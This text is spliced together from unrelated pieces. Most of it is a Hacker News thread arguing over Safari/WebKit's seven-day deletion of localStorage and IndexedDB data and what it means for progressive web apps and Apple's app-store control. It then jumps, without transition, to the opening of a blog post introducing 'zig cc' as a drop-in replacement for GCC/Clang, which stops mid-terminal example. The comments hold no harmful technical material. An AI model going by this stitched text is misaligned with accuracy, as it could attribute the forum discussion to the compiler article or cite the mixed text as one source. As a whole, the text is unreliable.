I absolutely don't have that expectation. I built a comic reader app that I use on my Android tablet, which saves files to IndexedDB. I've been using this for over a year and no files have ever been deleted, even after I stopped using the app for a month or so.

If Apple provided an alternative this would be ok. An alternative such as the native file access API (still a WIP). Or a prompt so that the user can allow long-term storage. Or supporting the web app manifest so that users confirm they want to 'install' a web app, granting it greater permissions.

But they've offered no alternatives here, that I can see. They've determined that client-side web apps are simply not important.

IvanK_net(3963) 3 days ago [-]

I have many useful files on my computer which I don't want deleted. You are saying that it is OK if the OS deletes all the files on my computer from time to time.

Local storage is the only way web apps can store any data on your computer (other than asking you to manually load/save some configuration file). Not all web apps can afford cloud storage for every user.

floatingatoll(4062) 3 days ago [-]

Perhaps the author doesn't realize that WebKit is open source. They could have used their screed to propose to the WebKit team that a first-party page loaded from a file:/// URI not have its client-side storage subject to the 7-day purge, by setting the 'firstPartyWebsiteDataRemovalMode' network connection property to 'none' — patch included! But they did not, which is quite disappointing.

The new change to ITP is here: https://github.com/WebKit/webkit/commit/4db42c1571d821572ea9...

The cookie filtering logic specifically is located here: https://github.com/WebKit/webkit/search?q=filtercookies

The file:/// handler is implemented here: https://github.com/WebKit/webkit/blob/master/Source/WebCore/...

(I don't have anything to do with Apple or WebKit.)

DiabloD3(26) 3 days ago [-]

Apple does not use that Webkit branch, however. They maintain their own branch internally that cherry picks from upstream. Webkit could very well accept a patch, and then Safari never ships that patch because they disagreed with it for use in Safari.

Also, unrelated fun fact: Did you know Webkit still uses svn? That Github repo you linked to is a clone of Webkit's own git repo (git.webkit.org), which is a mirror of their actual repo (svn.webkit.org).

IvanK_net(3963) 3 days ago [-]

It is related only to WebKit (Safari). So I think people will just switch to other browsers.

diggan(872) 3 days ago [-]

Except for iPhones/iPads where you don't really have a choice. Also most people don't give a shit which browser they use, they just use whatever browser is available when they get their device, which makes sense. But those users might soon have their data removed without really understanding why.

40four(4332) 2 days ago [-]

This just sounds like a great reason not to use Safari. I switched to iOS recently, but I'm a dedicated Firefox user, so I personally don't touch it except when I'm forced to by other apps opening links. (I was honestly REALLY disappointed in Apple when I realized that you're not allowed to set a default browser besides Safari, but that's another story.)

Forgive me, I'm a long-time Android user, but do a lot of people choose to use Safari as their main iOS browser, or are the usage numbers inflated because of the vendor lock-in?

hoten(10000) 2 days ago [-]

All browsers on iOS are WebKit (read: Safari) under the hood. Firefox and Chrome are just skins.

sequoia(3648) 2 days ago [-]

'Do a lot of people choose to use Safari?' No. On iOS, the web = Safari to almost all users.

sidhanthp(3490) 3 days ago [-]

I think this is a good idea. Developers should not be able to store something on my computer indefinitely without my consent. This doesn't apply to applications users add to their home screen.

This doesn't 'destroy' the PWA ecosystem. It just makes a user's intention explicit when they save a PWA to their home screen, rather than continuing to use it within the browser.

From the WebKit Blog (https://webkit.org/blog/10218/full-third-party-cookie-blocki...) 'Web applications added to the home screen are not part of Safari and thus have their own counter of days of use.'

duxup(4060) 3 days ago [-]

Your browser is already caching a whole lot of stuff that you don't know about just by visiting a site.

A little LocalStorage isn't going to hurt you.

Cookies I get, but I don't know of any dark patterns with localStorage, and the benefits are pretty great.

briandear(1439) 3 days ago [-]

What's wrong with a "normal" app? No server required and data stays only on the device. The argument that the author is building a PWA because other people abuse privacy (with apps) doesn't make much sense. Why not build the app, respect privacy, and be done with it?

LocalStorage is not a substitute for an actual database; it's a cache. The problem with the author's technique is that privacy-minded users clear their browsers from time to time, so they would inadvertently clear data they actually wanted to keep, because who uses LocalStorage as a persistent data store? Sure, it could be used that way as an 'off-label' use, but generally it's used to cache what is persistently stored elsewhere, or as a means to avoid multiple network calls in the process of doing something (such as saving calculations, the results of which will eventually be persisted). LocalStorage should be used as if it were a session store rather than something persistent.

sj4nz(4300) 3 days ago [-]

The problem with a 'normal' app is that now you are beholden to the rules/regulations/evaluations of a third party that can easily decide, without recourse, that your 'app' should not be in their store. Even if your app 'is fine', every update and upgrade incurs a delay through the third party's review process before your users receive it.

If web browsers provided _some API_ for persistent storage without yanking the carpet out from under developers, this wouldn't be such a huge problem. There _used_ to be a file-access API, but it was removed.

Personally, I think web browsers are too large a surface area to secure and keep secure, and the world is probably going to swing in the opposite direction: to native, downloadable applications without the interference of a third-party store.

SahAssar(10000) 3 days ago [-]

A normal app requires a separate build process, users to install it, and manual review for each update; perhaps the platform owner will just deny it without reason; and for Mac/iOS it also requires actually owning or 'borrowing' (using another person's or company's) build machine and software.

I don't understand why an installed PWA should not be able to keep its storage just as a 'normal' app can. It would clearly be better for both developers and users. There are so many apps and websites that could be more privacy-friendly if they could just trust localStorage to actually be 'storage'.

awinter-py(1536) 3 days ago [-]

Push messaging also doesn't work for PWAs on iOS.

(It does on Android.)

I get that controlling the walled garden is Apple's mobile strategy now, but this is costing developers so much blood, sweat and tears.

Both Xcode and Android Studio are heavy and horrible compared to the web, and the fact that you have to use both tools to release at scale makes them worse. Shopify wrote a dev post a few months ago saying 'we're React Native as much as possible now' and claiming it makes life easier, but React Native is worse than a PWA because you still have to build for mobile twice and deal with app store nonsense.

If PWAs supported push on iOS, with or without cookie expiration, they'd be the preferred launch strategy for most non-game apps.

p1necone(10000) 3 days ago [-]

Hasn't aggressively controlling the walled garden always been Apple's strategy? I don't see them changing any time soon. iOS didn't even have an app store initially, and it took a lot of pushing for that to happen (they realized Android was going to eat their lunch if they didn't).

chrisshroba(3652) 3 days ago [-]

Does this also mean you'll have to re-login to websites every 7 days? (Sorry, not very familiar with web tech!)

icebraining(3767) 3 days ago [-]

No, you'll have to re-login only if you haven't been to the site in the last 7 days.

thehappypm(10000) 3 days ago [-]

Maybe I'm being cynical here -- I'm not a web developer but have lots of experience managing web-based products -- but if you want to have state you should store it in the cloud, because local devices are volatile. Xbox Live, for example, uses a fairly simple service for cloud saves for games; local saves still happen, but any developer has the option to push saves to the cloud. The author definitely raises good points about how it's easier for developers not to have to worry about it, but cloud saves have some hefty benefits, like multi-device support, the user getting a new device, etc.

duxup(4060) 3 days ago [-]

The problem (at least for me) is offline apps, or customers who have poor or intermittent/unpredictable internet access.

They threw out LocalStorage et al. with the bathwater that is cookies.

deedubaya(4149) 3 days ago [-]

Yes, you're correct, but have you ever used an app that worked offline or performed well with a poor network connection? Or a website that provided wicked-fast data access despite only having a 2G connection?

These technologies can be leveraged to improve usability. Unfortunately, advertisers and third-party trackers make it so we can't have nice things.

mattl(3780) 3 days ago [-]

> By now, most people are aware of the amount of surveillance and tracking that their web usage is subject to on a daily basis and how this data can be used in ways that do not match their own personal values.

Sorry, but no way.

szc(10000) 3 days ago [-]

The data for 'Local Storage' is stored in ~/Library/Safari/Databases. You will need to give Terminal access to the Safari directory, as the current sandboxing works both ways: Safari stores security config info in this directory, and scripted malware could exfiltrate data and change values in this location.

To violate privacy (aka enable tracking), a sub-iframe could be set up that uses 'local storage' with a parent-page security policy that allows communication across the iframe boundary. Sorry, yes, I am being a bit vague.

Who cleans up ~/Library/Safari/Databases? I personally see crud in this directory from 2011 that has been migrated from older systems.

Almost not relevant now, but Flash also had a 'local storage' system that was shared across all Flash apps. Before sandboxing, it also allowed local apps to proxy and communicate (via shared memory) with any standalone Flash app on the system through any page that used the Flash plugin -- i.e. any running web browser, violating all attempts to have web compartmentalization rules.

dennisy(10000) 3 days ago [-]

This 'feature' also invalidates the use case for the WebCrypto API, since a user's keys would be stored in IndexedDB, which now means keys cannot be safely persisted.

synfonaut(10000) 3 days ago [-]

Exactly this. Most 'non-custodial' web wallets will die as a result of this change (some users may even lose money/assets). Very unfortunate, Apple!

sebringj(4343) 3 days ago [-]

That is terrible if you are working on a PWA game that caches assets for offline play. There should be some opt-in approach, similar to the way some apps ask for background location tracking. Silently wiping that data seems way worse than simply letting local data be relied upon. Not cool.

icebraining(3767) 3 days ago [-]

What's the problem with the client having to re-download those assets if they don't play for a week? Seems long enough that I'd expect a patch download on a typical gaming platform, for example.

Jach(2081) 3 days ago [-]

Workaround: encode your app's state into window.location.hash

icebraining(3767) 3 days ago [-]

That works as long as the user keeps the tab open, but if they use a bookmark (or just remember the domain), the hash part will be lost.

withinboredom(4322) 3 days ago [-]

I've seen this before on an ecommerce site :sigh:

Wife: Hey, check out this! [link with embedded state]

Me: Wow, I'm logged in as you and can even see your payment information! Let's not buy from this site!

Let's not do this. Ever.

stcredzero(3324) 3 days ago [-]

> Many web developers are turning to Electron in these cases but IMHO this is a waste of resources as the Electron runtime is not shared among the different apps running and there is only so many browser engines your computer can run before it has impact on its performance

Why? Why isn't it the case that the code which runs Electron, and library code JIT-ted by Electron, can be reused by other processes on the same system?

The_rationalist(10000) 3 days ago [-]

It can be reused; it's just that nobody actually cares enough about contributing to upstream Electron. There are unofficial solutions like electron-shared. Ionic and Carlo also use only one Chromium for every instance.

burtonator(1948) 3 days ago [-]

I ported Polar (https://getpolarized.io/) over to a PWA about a year ago.

It's kind of a nightmare due to both Google and Apple messing things up.

PWAs could be an amazing platform but both companies are really messing it up.

Apple is trying to kill them by giving plausible explanations as to why they can't have PWAs. Security this, blah blah blah. There's no reason PWAs can't work well in Safari other than that Apple wants you to port your app to the App Store and get locked into their native APIs.

Google's problem is, well, they're Google. Meaning things are somewhat incoherent, docs are all over the place, they start new initiatives then abandon them halfway, etc.

Consumers are another problem. They have no understanding of PWAs, so they go to the app store, don't find us, and then complain that we don't have an app.

The plan now is to use Google TWAs and port our PWA to Android.

We're going to do the same thing for Apple after we do the Android release, BUT I think there's a 50% chance that Apple will just flat-out block us.

I think we might have a chance of getting around it if we use mobile gestures properly, use platform-specific APIs like the camera, audio, and GPS that aren't on the web, and try to really integrate into the platform properly.

For example, they have an API to detect dark mode now. If that's on, we're just going to magically enable our dark mode in the app.

Razengan(4083) 3 days ago [-]

> ... Consumers are another problem. ...

You blame Apple, Google and your consumers, instead of just making native apps. Why?

comex(1470) 3 days ago [-]

I tried using your app on an iPhone (with Add to Home Screen).

- If I press the settings gear, the text on the settings page is about twice as wide as the screen, requiring horizontal scrolling.

- On the front page, if I open the color picker, it's partially offscreen.

- On all pages, if I do a scroll gesture in the wrong direction, it scrolls the entire UI rather than just the scrollable part. Admittedly, iOS has long made this hard to avoid without hacky JavaScript, but it's been doable, and it's much easier now [1].

- The hamburger button on the left opens a modal view that covers all of the screen but a small margin on the right, making it unreasonably hard to exit.

- If I try to create a tag or folder, the name prompt appears under the other modal view and is improperly sized.

- Oh, and the UI looks thoroughly non-native, e.g. Google-style floating action button, UI not covering the status bar, bottom tab buttons too short, etc. The animations are also haphazard.

My point is not just to nitpick. It's just that while I sympathize with the idea of PWAs in principle, almost every single time I see someone talk about theirs, the PWA in question has immediately obvious glaring UI defects that have nothing to do with browser limitations, and leave it far below the standard of a good native app, or even a bad one. I honestly don't know why this is, but experiencing it over and over makes it hard for me to care about PWAs.

[1] https://benfrain.com/preventing-body-scroll-for-modals-in-io...

dazbradbury(1767) 3 days ago [-]

Regarding your point on consumers, we put our PWA/TWA into the app store (for the reason you outlined) and now get a raft of negative reviews saying the TWA is the same as the mobile site... which is frustrating, because that's the point.

Making it clear why a TWA is in the app store is hard in itself. Trying to explain why it's better for consumers than a native app + mobile site is even harder.

See these reviews for yourself here: https://play.google.com/store/apps/details?id=uk.co.openrent

quickthrower2(1376) 3 days ago [-]

Makes sense: they want you to create native apps so they can collect their rent, and also dictate what is in, what is out, and control how apps are searched for.

vosper(4327) 3 days ago [-]

> There's no reason they can't have PWAs work well in Safari other than they want you to port your app to the App Store and get locked into their native APIs.

Is it possible they also want you to port your app to the App Store to prevent an explosion of garbage and malware that could happen if PWAs really took off?

b1tr0t(4339) 3 days ago [-]

Hi there, I'm the product manager for PWAs on the Chrome team.

Very interested in hearing about pain points you've had building out PWAs, especially if there are features you were keen on that haven't been released. Easiest way to reach me is on Twitter: https://twitter.com/b1tr0t

Fully agree with you that docs are all over the place. We've started to consolidate docs under web.dev, and the PWA section launched recently (https://web.dev/progressive-web-apps). Consolidating and adding docs is an active area of investment, and our goal is to create a well-lit path for developers to succeed with PWAs.

6gvONxR4sf7o(10000) 2 days ago [-]

> Consumers are another problem. They have no understanding of PWAs...

Really? You're blaming your customers for not being sufficiently tech savvy and not wanting what you're providing?

Personally, I am happy with Apple's decision here.

Animats(2152) 3 days ago [-]

What are private client-side PWAs anyway?

Good question. The definition of a 'progressive web app' is vague. What they seem to mean is a web page which, once you visit it, is cached locally, and thereafter runs locally. The web page accesses various servers, not necessarily ones from the same domain as the web page. Persistent state, if any, is stored locally. The page gets its own icon on the home screen somehow, so it sort of looks like an 'app'.

Apparently 'progressive web apps' are supposed to have a browser service worker so they can get notifications pushed to them from somewhere, although it's not clear why that's essential. That would seem to depend on whether the function performed requires being notified of something happening elsewhere.

Apple apparently dislikes this because they don't get to force people to use their store, with their big cut of the revenue.

Is that about right?

Does this only apply to pages read through Apple's browser, or does it impact Firefox, too?

judah(3591) 3 days ago [-]

> Is that about right?

Progressive Web Apps are strictly defined:

1. The app has an app manifest describing metadata about the web app, enabling it to be treated like an app (e.g. it can be installed)

2. The app has a service worker, enabling it to work offline like a native app.

3. It's served over HTTPS.

Those are the 3 technical requirements of a PWA.

There's also the philosophical direction of Progressive Web Apps: they're progressive, meaning they offer the app's essential experience no matter the device, but enhance progressively based on the device they're running on. That is, more capable devices let the app offer more functionality without blocking out users on lower-end devices.

JumpCrisscross(38) 3 days ago [-]

> Apple apparently dislikes this because they don't get to force people to use their store

This is part of the motivation. The other is advertisers using persistent local storage to track users [1].

[1] https://clearcode.cc/blog/alternatives-to-cookie-tracking/

soapdog(4079) 3 days ago [-]

> Does this only apply to pages read through Apple's browser, or does it impact Firefox, too?

This applies to WebKit, but if that decision sticks, Mozilla might follow. Who knows... I hope not. Also be aware that Firefox on iOS is WebKit.

robenkleene(3680) 3 days ago [-]

I'm guessing that Apple will start hindering web apps because the new mouse support in iPadOS is going to be such a boon to web apps. Because of sandboxing, web apps are the only cross-platform apps that can run in their full versions on iPadOS. I wrote a quick summary of the situation[0].

Therefore, since native apps are more of a platform differentiator than web apps, moving forward we can expect Apple to start systemically hindering web apps, especially ones that are good on iPadOS, in order to boost native apps.

(I'm not saying this is necessarily the start of it, but I am saying I'm not surprised. This is exactly the type of change, targeting exactly the type of app, I'd expect.)

[0]: https://blog.robenkleene.com/2020/03/20/ipadoss-new-mouse-su...

saagarjha(10000) 3 days ago [-]

The people who work on making websites function better on iPad are literally a 20-second walk away from the people who work on Intelligent Tracking Prevention. Do you really think that they'd seek to undermine each other in this way?

cageface(3172) 3 days ago [-]

> moving forward we can expect Apple to start systemically hindering web apps

They have been doing this for quite some time now: always ostensibly to protect users, but always also conveniently putting web apps at a permanent disadvantage to native apps.

For my part I'm not interested in being a user of a platform so hostile to the web that it disallows any third party browsers.

ChrisMarshallNY(4343) 3 days ago [-]

As a native app developer, I can live with this.

Veen(10000) 3 days ago [-]

If this were true, how would you explain the recent improvements to Safari on the iPad that make it as capable as desktop Safari? Until last year Google Docs did not work in Safari on the iPad. Now it works very well indeed. The same is true of most web apps.

brundolf(1518) 3 days ago [-]

Which is strange, because they're already under scrutiny for being anti-competitive WRT their app ecosystem. Having good support for web apps could've softened that case a little bit.

madeofpalk(3997) 3 days ago [-]

> I'm guessing that Apple will start hindering web apps because the new mouse support in iPadOS is going to be such a boon to web apps.

As a web developer, I've never believed Apple has hindered web development on their platform, purposefully or not. They just don't spend their resources adding in WebBluetooth or whatever new API-of-the-day Google has decided to come up with.

As I see it, their focus is on the user, which is why they've been slow to adopt APIs that are privacy concerns, or drain battery, or have other negative implications.

wubin(10000) 3 days ago [-]

The source clarifies that this only applies to websites run within the Safari browser.[1] PWAs added to the home screen aren't affected.

> As mentioned, the seven-day cap on script-writable storage is gated on 'after seven days of Safari use without user interaction on the site.' That is the case in Safari. Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer. We do not expect the first-party in such a web application to have its website data deleted. If your web application does experience website data deletion, please let us know since we would consider it a serious bug. It is not the intention of Intelligent Tracking Prevention to delete website data for first parties in web applications.

[1] https://webkit.org/blog/10218/full-third-party-cookie-blocki...

the_gipsy(10000) 2 days ago [-]

Good luck getting your app added to the home screen. It only works through Safari, so Chrome or Firefox users are ruled out, and it's hidden under some 'bookmark' or 'share' menu that is too difficult to discover.

iameli(10000) 3 days ago [-]

'Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer.'

But said timer... does nothing? Why does it exist?

osrec(3297) 3 days ago [-]

That's a relief. We've built our business on our PWA, which also has an offline mode. It would be annoying if we had to adjust it for (yet another) Safari quirk.

gridlockd(10000) 3 days ago [-]

> 'Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer.'

What exactly does that mean? So you use the app for seven (perhaps non-consecutive) days, and now all third parties that haven't been, uh, interacted with get their data wiped - but not the first party, because that has been interacted with by virtue of the PWA being launched in the first place?

I guess that solves the problem?

pcdoodle(3877) 3 days ago [-]

Thank you for the clarification.

modeless(1487) 3 days ago [-]

As the article has been updated to say, 'installing' a PWA to the home screen is an optional step that many people prefer not to do in favor of bookmarks or the address bar or the new tab page or whatever.

But it's no surprise that Apple would want to impose an 'install' step on the web to prevent it from looking more attractive than the App Store.

pier25(2695) 3 days ago [-]

Ok, but OTOH Apple is not helping PWAs by hiding 'Add to Home Screen' in submenus and by not having an official API to show a banner like Chrome has on Android.

Edit:

Also, what about desktop?

untog(2451) 3 days ago [-]

I don't think that's actually what it clarifies. Or at the very least it's very confusing.

> have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer.

This makes it sound very much like homescreen apps will have their data wiped after 7 days of non-use.

> We do not expect the first-party in such a web application to have its website data deleted.

And this does not. It's a very confusing word salad.

btown(3769) 3 days ago [-]

If there is, as they say, a dedicated counter on those home screen applications, what is the threshold? Will home-screen PWAs that aren't used often (say, for infrequent uses like travel) have first-party data deleted after the icon isn't tapped for some time? This is highly unclear and confusing.

finaliteration(4235) 3 days ago [-]

I'm a little confused by this and maybe I'm missing something. Wasn't localStorage always intended to be treated as a volatile storage mechanism for non-critical data and caching? The advice I've seen for several years says to avoid storing sensitive or critical data there.

Can PWAs not switch to using IndexedDB which seems like it's more purpose-built for this use case?

No snark intended. I'm legitimately curious what the situation is and where any blockers are.

nicoburns(10000) 3 days ago [-]

> Can PWAs not switch to using IndexedDB which seems like it's more purpose-built for this use case?

IndexedDB is also subject to the 7-day limit, leaving no persistent storage for web apps at all.

judah(3591) 3 days ago [-]

In the original post from Apple[0] announcing these measures, they list all the script-writable locations that are subject to cache clearing:

- Indexed DB

- LocalStorage

- Media keys

- SessionStorage

- Service Worker registrations (I guess this means service worker caches)

[0]: https://webkit.org/blog/10218/full-third-party-cookie-blocki...

throaway9aaaapp(10000) 3 days ago [-]

Our company has started shaming iOS. We tell users that, because of a commercial policy aiming to increase revenue from their App Store, iPhones and iPads 'do not support the Web 2.0 technology enabling powerful experiences for web sites and web applications, while Android and Windows devices have been supporting this technology since 201x'. We briefly explain in one sentence that it would not be the best use of our resources to try to bypass Apple's technological decisions, but that they should contact Apple for further information.

We then link them to a $30-$50 Android device that they can buy on Amazon and use as a second device for our services 'if they are interested in a more powerful web experience'. We provide a basic version to all users, but put a shamewall in front of advanced features. Best use of our time and resources.

It is time to push back; stop making Apple's problems your problems. Educate people without ranting and offer them solutions. Developers have the bad habit of trying to cover up this kind of nonsense and taking the blame, while really Apple are the ones who should be ashamed. If people love your product/service, getting a $30 phone to be power users and make their life easier and their experience richer will not be a big deal for them. It's all about educating them the right way.

spzb(4265) 3 days ago [-]

Obviously I have no idea what your product is, but if I got that message I'd likely just go to one of your competitors (assuming they exist). I wouldn't go and buy another device unless it was for an absolutely critical application.

staplers(10000) 3 days ago [-]

Sounds extremely condescending and off-putting. I'd be annoyed if a company said this to me.

There is a lot to love about Apple products outside of a few Safari restrictions. They're not perfect, but better than a lot of alternatives.

Hackbraten(10000) 3 days ago [-]

Are you aware of the poor security a $30 phone has?

jbeam(10000) 3 days ago [-]

I would have to REALLY love your service to want to carry around an extra device to use it.

SifJar(3849) 3 days ago [-]

In addition to what others have said, I think the effectiveness of this likely depends heavily on the target audience - to a non-technical user, this will probably come across as lazy. From their perspective, everything else works fine on Apple, so you must be complaining about nothing.

Of course, if everyone did the same, people would start to realise the problem might be with Apple, but the chances of all (or most, or even many) big web services deciding to alienate such a large portion of their (potential) customers seem slim.

jamil7(4303) 3 days ago [-]

> If people love your product/service getting a $30 phone to be power users and make their life easier and their experience richer will not be a big deal for them.

So you're suggesting shifting the development costs of you building a native / cross platform app directly to your customers? Does this work?

untog(2451) 3 days ago [-]

What technologies does Safari not support that you need?

That's a genuine question by the way. I've been frustrated by Apple's reluctance in the past but since they implemented Service Workers things have gotten better. I still really wish they had Web Push but I do understand at least conceptually why they'd be hesitant.

judah(3591) 3 days ago [-]

On one hand, I don't like this direction from Apple because it's meant to boost Apple's proprietary app store business -- which directly competes with the open web -- but masquerades as a privacy issue.

On the other hand, this direction keeps web devs honest: local storage, service worker, cookies and other script-writable areas are meant to be temporary.

fomojola(3588) 3 days ago [-]

I see nothing in any of the specs that implies local storage was intended to be temporary. You could argue cookies, maybe, but even that I'd dispute: it is a user agent, and I should be able to tell it 'don't delete my stuff'. I already have browser controls over my local storage: I can go into settings in every reasonable browser and flush that down the tubes.

mr_toad(4125) 3 days ago [-]

It's always been impossible to rely on local storage for long-term use.

Users clear their caches. They swap browsers. They swap machines. They use their phone instead of their desktop. They use private mode, or sand boxing. They re-install their OS. They buy a new machine.

Don't be lazy. Using local storage without a backup is not acceptable.

And what kind of 'progressive' web app expects all the features in every client? Have we forgotten what progressive means?

Don't be entitled. You are not more important than your users.

lnanek2(4206) 3 days ago [-]

Based on the blog, it sounds like he wants to download RSS feeds to the user's device, and not store them on his server, to speed up development (all those complaints about FAANG being able to develop at web scale and him not wanting to run a backend).

Then, if the user clears the cache or changes computers, they lose the stuff they were following and have to wait for new items, but it's not the end of the world. They might even expect it if you name/describe the app a certain way.

E.g. if you download an app called 'Podcast Downloader' that says it just downloads any new podcasts from feeds you follow for later offline consumption on your current device, you might not expect a podcast on your phone to magically jump to your desktop without a re-download from the original site.

Seems like it could be a valid trade-off if it lets a front-end-only web dev publish apps he couldn't publish otherwise because he can't/won't do backend work. Storing user media on the backend is not cheap. The company I'm at has spent months of developer time moving from Google to Amazon, for example, just for the infra cost improvements that come from serving terabytes of data off one instead of the other.

sandstrom(10000) 3 days ago [-]

How would static 'single-page' apps (HTML/JS/CSS) that store session tokens in localStorage avoid the 7-day auto-logout?

Perhaps using something like this: https://developer.mozilla.org/en-US/docs/Web/API/Credential_...

Anyone know of other Web APIs that could be used?

aurbano(4343) 3 days ago [-]

Cookies are a lot safer for authentication than localStorage. The only problem with this change is persisting data for offline use, not authenticating the user.

jdxcode(10000) 3 days ago [-]

might have to use cookies

saagarjha(10000) 3 days ago [-]

Related discussion from earlier today: https://news.ycombinator.com/item?id=22683535

WebKit blog post from yesterday: https://news.ycombinator.com/item?id=22677605

dang(182) 3 days ago [-]

I think we'll merge today's threads. Any reason not to? Edit: merged.

restoreddev(4086) 3 days ago [-]

I guess this means Safari won't support persistent storage anytime soon. I was looking forward to it becoming a standard API. https://developer.mozilla.org/en-US/docs/Web/API/StorageMana...

OJFord(2776) 3 days ago [-]

Based on the table there, it seems Edge had support but removed it anyway?

heynk(4035) 3 days ago [-]

I'm an engineer at a platform that makes it easier to build privacy-friendly apps. This means that all apps on our platform have app-specific private keys stored on the client side (in localStorage), and they never touch a server.

With this change, you're essentially 'logged out' after 7 days of inactivity.

This is a pretty bad user experience, and I honestly am not sure how to mitigate it. macOS Safari might not be a massive market, but iOS Safari is.

Any thoughts about how we should address this change?

oefrha(4165) 3 days ago [-]

Being logged out after 7 days of inactivity could be a little bit annoying, but I can live with that, as long as I can log in again.

I could be misinterpreting your comment, but are you saying your keys are simply destroyed upon this "log out"? Then I'm not really sure why your platform was considered working in the first place, if it's tied to a specific browser on a specific device and won't survive a clearing of storage, which any user can do at any time for a variety of reasons.

Andrew_nenakhov(10000) 3 days ago [-]

The issue would not be that problematic if I could just run a real Firefox browser on iOS, not a skin over Safari, which leads me to a question that has puzzled me for a long time.

Why is Apple not facing antitrust charges for not allowing competing browsers on their platform? Microsoft didn't SHIP competing browsers, but allowed them to run just fine on Windows, and was fined nonetheless; yet Apple somehow gets away with not even allowing competing browsers at all!

I'm not from the US, so maybe I'm missing something about these antitrust lawsuits. Can someone please explain?

Karunamon(3106) 3 days ago [-]

This is a common misconception.

1. Apple is not a monopoly player in the app market.

2. Microsoft's antitrust fine was for forcing OEMs to not include any competing browsers (Netscape) on threat of losing special pricing.

judge2020(4287) 3 days ago [-]

Is there any evidence that local storage is being used as a pseudo-cookie to track users? If so, keeping local storage around while regular cookies are deleted would defeat the purpose of deleting cookies for anti-tracking reasons.

majormajor(10000) 3 days ago [-]

I was in the adtech world about ten years ago, and localStorage was definitely one of the things used for 'supercookie' stuff (along with Flash, ETags, and probably other things I'm forgetting).

hosteur(10000) 3 days ago [-]

This is exactly what it is about. I welcome the move from Apple. Web devs can store state server side. They cry because tracking will be harder now.

JumpCrisscross(38) 3 days ago [-]

> Is there any evidence that local storage is being used as a pseudo-cookie way of tracking users?

Yes [1].

[1] https://clearcode.cc/blog/alternatives-to-cookie-tracking/

bradgessler(2194) 3 days ago [-]

Do any lawyers out there know if Apple's sabotage of PWAs, by their inaction or by 'features' like this, could be considered anti-competitive behavior for an antitrust lawsuit?

yaktubi(10000) 3 days ago [-]

Not a lawyer, but probably not. There are many ways to make an app for their platforms; wanting to use web technologies specifically is the implementor's decision.

alkonaut(10000) 3 days ago [-]

Did PWAs take off? What are some famous/big PWAs now? I can't remember ever 'installing' anything in a browser as an app, or even being asked if I wanted to. Am I misunderstanding what they are?

Macha(3795) 3 days ago [-]

devdocs.io is the most successful example I'm aware of. I've never 'installed' it as an app, as I don't use a browser that supports that (basically Edge, Safari or Android Chrome), but I've certainly relied on its ability to load without an internet connection for train/plane journeys.

judah(3591) 3 days ago [-]

Microsoft will be releasing PWA versions of the Office suite.

Twitter, Instagram, Starbucks, Pinterest and more have PWAs as well.

theturtletalks(4171) 3 days ago [-]

https://appsco.pe/ has popular PWAs. They don't need to be installed; they just look and work like an app in the browser.

shawnz(10000) 3 days ago [-]

The key is the 'P': Progressive. A PWA is just a web app, but one that takes advantage of features you'd typically see in a locally installed application like local storage, notifications, etc. This might mean it has metadata to make it 'installable' in browsers that support that, but I wouldn't say that's a requirement to be considered a PWA.

soapdog(4079) 3 days ago [-]

I'm the OP, I use a lot of PWAs. My main machine is a Surface Pro X and I don't have native apps (as in native aarch64 binaries) for many of the things I'd like to use. So, I'm using PWAs for Instagram, Twitter, Kindle, Pinafore (mastodon client), Spotify, and some of my own.

I was developing a feed reader that was supposed to be a client-side-only PWA but that's tricky.

koonsolo(4238) 3 days ago [-]

Twitter client is a PWA.

seanabrahams(10000) 3 days ago [-]

PWAs haven't taken off because Apple won't implement full Push API support in Safari, thus forcing you to go through the App Store if your web site or application needs push notifications. The App Store then complains if you try to publish an app that just wraps your web site so that you can have push notifications. It's... infuriating.

StephenCanis(10000) 3 days ago [-]

PWAs are also useful where you want visitors to be able to access a portion of a website while offline. I run a site that hosts audio tours[1] for museums and walking tours. I use PWAs to let visitors quickly download the tour onto their phone in case they don't have a data plan or a portion of the tour has no cell service.

Apple definitely makes it difficult to use them effectively. For example, you need to use Safari on iOS in order to download the PWA - it won't work if you're on Chrome or another third-party browser.

[1] https://www.youraudiotour.com

arendtio(10000) 3 days ago [-]

How should PWA take off, when Apple with a high mobile market share refuses to implement basic APIs like the Push API and other browsers can't run their own engine on iOS? It is abusive, but who cares.

untog(2451) 3 days ago [-]

There's a chicken/egg issue here. Apple's support for progressive web apps has been subpar, so it's difficult to justify the extra effort of making a PWA when a major platform doesn't fully support it. Which, in turn, means people turn around and say 'why should Apple support PWAs? No one uses them!'

drkstr(10000) 1 day ago [-]

DevDocs is great for offline documentation, and is entirely a PWA. You just preload the doc sets you're interested in while online, and they will always be there for you when you need them. Automatic updates can be enabled for when you come back online.

woodson(4259) 3 days ago [-]

Twitter's web client is a PWA





Historical Discussions: Zig cc: A drop-in replacement for GCC/Clang (March 24, 2020: 826 points)

(826) Zig cc: A drop-in replacement for GCC/Clang

826 points 4 days ago by hazebooth in 10000th position

andrewkelley.me | Estimated reading time – 33 minutes | comments | anchor

`zig cc`: a Powerful Drop-In Replacement for GCC/Clang

If you have heard of Zig before, you may know it as a promising new programming language which is ambitiously trying to overthrow C as the de-facto systems language. But did you know that it also can straight up compile C code?

This has been possible for a while, and you can see some examples of this on the home page. What's new is that the zig cc sub-command is available, and it supports the same options as Clang, which, in turn, supports the same options as GCC.

Now, I'm sure you're feeling pretty skeptical right about now, so let me hook you real quick before I get into the juicy details.

Clang and GCC cannot do this:

[email protected] ~/tmp> cat hello.c
#include <stdio.h>
int main(int argc, char **argv) {
    fprintf(stderr, "Hello, World!\n");
    return 0;
}
[email protected] ~/tmp> clang -o hello.exe hello.c -target x86_64-windows-gnu
clang-7: warning: argument unused during compilation: '--gcc-toolchain=/nix/store/ificps9si1nvz85f9xa7gjd9h6r5lzg6-gcc-9.2.0' [-Wunused-command-line-argument]
/nix/store/7bhi29ainf5rjrk7k7wyhndyskzyhsxh-binutils-2.31.1/bin/ld: unrecognised emulation mode: i386pep
Supported emulations: elf_x86_64 elf32_x86_64 elf_i386 elf_iamcu elf_l1om elf_k1om
clang-7: error: linker command failed with exit code 1 (use -v to see invocation)
[email protected] ~/tmp> clang -o hello hello.c -target mipsel-linux-musl
In file included from hello.c:1:
